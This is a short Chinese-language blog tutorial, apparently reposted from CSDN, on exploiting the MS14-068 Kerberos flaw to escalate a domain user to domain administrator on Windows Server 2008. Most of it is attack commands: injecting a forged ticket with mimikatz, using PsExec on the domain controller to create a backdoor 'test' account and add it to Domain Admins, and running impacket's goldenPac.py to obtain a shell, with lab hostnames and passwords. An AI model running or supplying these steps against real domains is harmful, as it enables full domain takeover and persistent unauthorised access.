其他分享
首页 > 其他分享> > MS14-068漏洞进行提权

MS14-068漏洞进行提权

作者:互联网

参考:https://blog.csdn.net/qq_37683287/article/details/120450044

server2008有效 MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。

第一步:利用MS14-068伪造生成TGT
在这里插入图片描述

第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书

kerberos::ptc TGT_test@moonsec.fbi.ccache

在这里插入图片描述

第三步:获取域管理员权限。创建一个 test 账号并加入域管理员组,从而随时可以登录域控主机进行操
作。

PsExec.exe \\dc cmd.exe // 添加test用户
net user test abc123! /add /domain // 把 test 用户添加进域管理员组
net group "domain admins" test /add /domain // 查看域管理员net group "domain admins" /domain

或者使用

python3 goldenPac.py -dc-ip 192.168.0.142 -target-ip 192.168.0.142 moonsec.fbi/test:123456@08server-dc.moonsec.fbi

在这里插入图片描述

GoldenPac
goldenPac.py 是一个用于对 Kerberos 协议进行测试的工具,它集成在 impacket 工具包里。

Kali 在使用之前需要先安装 Kerberos 客户端

apt-get install krb5-user -y

利用 goldenPac.py 获取 Shell

python3 goldenPac.py 0day.org/jack:Aa123456@OWA2010SP3.0day.org

这里使用 IP 进行连接会连接不成功,只能使用主机名,因此可以在 hosts 文件中添加主机名对应的 IP

goldenPac.py 是通过 PsExec 获得 Shell 的,因此会产生大量的日志,而且现在这种连接方式也已经被各大杀软所拦截。

标签:goldenPac,domain,068,py,提权,管理员,MS14,test,net
来源: https://blog.csdn.net/qq_50854790/article/details/123122270